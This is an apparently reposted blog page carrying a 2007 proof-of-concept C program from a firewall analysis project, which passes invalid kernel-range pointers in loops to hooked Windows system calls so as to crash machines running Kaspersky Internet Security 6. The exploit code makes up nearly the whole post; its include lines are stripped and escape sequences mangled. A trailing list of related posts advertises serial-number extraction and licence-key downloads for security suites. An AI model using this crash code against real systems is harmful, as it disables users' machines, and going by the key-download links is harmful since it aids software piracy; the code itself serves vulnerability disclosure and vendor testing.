Vuln: Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities

原创 2007年09月28日 17:00:00
/*

Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P006KA)


Usage:
prog FUNCNAME
FUNCNAME - name of function to be checked

Description:
This program calls given function with parameters that crash the system. This happens because of
insufficient validation of function arguments in the driver of the firewall.

Test:
Running the testing program with the name of a function from the list of affected functions.

*/

#undef __STRICT_ANSI__
#include
#include
#include
#include
#include

typedef NTSTATUS NTAPI (*ZW_CREATE_PROCESS_EX)(OUT PHANDLE ProcessHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes,IN HANDLE InheritFromProcessHandle,IN BOOLEAN InheritHandles,IN HANDLE SectionHandle OPTIONAL,IN HANDLE DebugPort OPTIONAL,IN HANDLE ExceptionPort OPTIONAL,IN ULONG Unknown);


void about(void)
{
printf("Testing program for Multiple insufficient argument validation of hooked SSDT function (BTP00000P006KA)/n");
printf("Windows Personal Firewall analysis project/n");
printf("Copyright 2007 by Matousec - Transparent security/n");
printf("http://www.matousec.com/""/n/n");
return;
}

void usage(void)
{
printf("Usage: test FUNCNAME/n"
" FUNCNAME - name of function to be checked/n");
return;
}

int main(int argc,char **argv)
{
about();

if (argc!=2)
{
usage();
return 1;
}

if (!stricmp(argv[1],"NtCreateKey") || !stricmp(argv[1],"ZwCreateKey"))
{
HANDLE handle;

for (int i=0;i>=0;i++)
ZwCreateKey(&handle,KEY_ALL_ACCESS,(PVOID)(0x80000000+i),0,NULL,0,NULL);

} else if (!stricmp(argv[1],"NtCreateProcess") || !stricmp(argv[1],"ZwCreateProcess"))
{
OBJECT_ATTRIBUTES oa;
for (int i=0;i>=0;i++)
ZwCreateProcess((PHANDLE)(i+0x80000000),PROCESS_ALL_ACCESS,&oa,NULL,FALSE,NULL,NULL,NULL);
} else if (!stricmp(argv[1],"NtCreateProcessEx") || !stricmp(argv[1],"ZwCreateProcessEx"))
{
ZW_CREATE_PROCESS_EX ZwCreateProcessEx=(ZW_CREATE_PROCESS_EX)GetProcAddress(GetModuleHandle("ntdll.dll"),"ZwCreateProcessEx");
if (ZwCreateProcessEx)
{
OBJECT_ATTRIBUTES oa;
for (int i=0;i>=0;i++)
ZwCreateProcessEx((PHANDLE)(i+0x80000000),PROCESS_ALL_ACCESS,&oa,NULL,FALSE,NULL,NULL,NULL,0);
}
} else if (!stricmp(argv[1],"NtCreateSection") || !stricmp(argv[1],"ZwCreateSection"))
{
HANDLE handle;
for (int i=0;i>=0;i++)
{
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
ZwCreateSection(&handle,0,oa,NULL,0,0,NULL);
}
} else if (!stricmp(argv[1],"NtCreateSymbolicLinkObject") || !stricmp(argv[1],"ZwCreateSymbolicLinkObject"))
{
HANDLE handle;
OBJECT_ATTRIBUTES oa;
for (int i=0;i>=0;i++)
{
UNICODE_STRING us={0x1000,0x1000,(PWSTR)(i+0x80000000)};
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
ZwCreateSymbolicLinkObject(&handle,SYMBOLIC_LINK_ALL_ACCESS,&oa,&us);
}
} else if (!stricmp(argv[1],"NtCreateThread") || !stricmp(argv[1],"ZwCreateThread"))
{
HANDLE handle;
CLIENT_ID clid;
OBJECT_ATTRIBUTES oa;
USER_STACK us;
for (int i=0;i>=0;i++)
ZwCreateThread(&handle,THREAD_ALL_ACCESS,&oa,(HANDLE)i,&clid,(PCONTEXT)(i+0x80000000),&us,FALSE);
} else if (!stricmp(argv[1],"NtLoadKey2") || !stricmp(argv[1],"ZwLoadKey2"))
{
OBJECT_ATTRIBUTES oa2;

for (int i=0;i>=0;i++)
{
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
ZwLoadKey2(oa,&oa2,REG_NO_LAZY_FLUSH);
}
} else if (!stricmp(argv[1],"NtOpenKey") || !stricmp(argv[1],"ZwOpenKey"))
{
HANDLE handle;
for (int i=0;i>=0;i++)
{
POBJECT_ATTRIBUTES oa=(PVOID)(i+0x80000000);
ZwOpenKey(&handle,KEY_ALL_ACCESS,oa);
}
} else if (!stricmp(argv[1],"NtOpenProcess") || !stricmp(argv[1],"ZwOpenProcess"))
{
HANDLE handle;
OBJECT_ATTRIBUTES oa;
UNICODE_STRING us={0x1000,0x1000,NULL};
InitializeObjectAttributes(&oa,&us,0,NULL,NULL);
for (int i=0;i>=0;i++)
{
PCLIENT_ID clid=(PVOID)(i+0x80000000);
ZwOpenProcess(&handle,PROCESS_ALL_ACCESS,&oa,clid);
}
} else printf("/nI do not know how to exploit the vulnerability using this function./n");

printf("/nTEST FAILED!/n");
return 1;
}
 

Norton Internet Security 序列号提取(卡饭)

准备材料: 1. Norton Internet Security 2014 (版本:21.1.0.18)     下载:http://buy-download.norton.com/downlo...
  • netplaier
  • netplaier
  • 2015年11月18日 20:22
  • 4199

Win8 CPU占用率高,服务主机:本地服务进程占用CPU高

转自软迷 Win8消费者预览版放出来之后,软迷也是立马在自己的电脑上安装了,安装完成之后发现Win8 CPU占用率高,打开任务管理器,其中有几个系统进程:如服务主机:本地服务(对等网...
  • n1n4m5
  • n1n4m5
  • 2014年06月04日 23:14
  • 17208

elastic5.2和kibana5.0安装配置问题简介(centos6.5)

之前的博客www.superdaojian.com已经废弃,这里是新的起点,加油~近期首篇文章是elasticsearch相关的基础配置及问题总结~...
  • superdaojian
  • superdaojian
  • 2017年02月16日 15:49
  • 2789

kaspersky Internet Security 2009 Key To 2009年12月

  • 2009年01月08日 09:37
  • 2KB
  • 下载

Kaspersky Internet Security 2010

  • 2010年10月21日 11:13
  • 333KB
  • 下载

Kaspersky Internet Security 2010

  • 2011年03月15日 08:18
  • 2KB
  • 下载

phpcms v9 Multiple Vulnerabilities

hpcmsV9最新版SQL注射+XSS 详细说明: XSS  public function public_get_suggest_keyword() { $ur...
  • god_7z1
  • god_7z1
  • 2012年07月18日 14:56
  • 605

Multiple Vulnerabilities in Scrutinizer NetFlow & sFlow Analyzer

Trustwave SpiderLabs Security Advisory TWSL2012-014: Multiple Vulnerabilities in Scrutinizer NetFlo...
  • cnbird2008
  • cnbird2008
  • 2012年08月05日 19:47
  • 1144

avast! Internet Security 6.0.100安装及激活文件-6 共7个

  • 2011年08月13日 14:24
  • 14MB
  • 下载

iOS安全编码指南 Secure Coding Guide -- 02 Types of Security Vulnerabilities 上

IOS安全编码指南 Secure Coding Guide -- 02 Types of Security Vulnerabilities 上 Most software security vu...
  • u014222687
  • u014222687
  • 2016年06月10日 19:41
  • 358
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:Vuln: Kaspersky Internet Security 6 SSDT Hooks Multiple Local Vulnerabilities
举报原因:
原因补充:

(最多只允许输入30个字)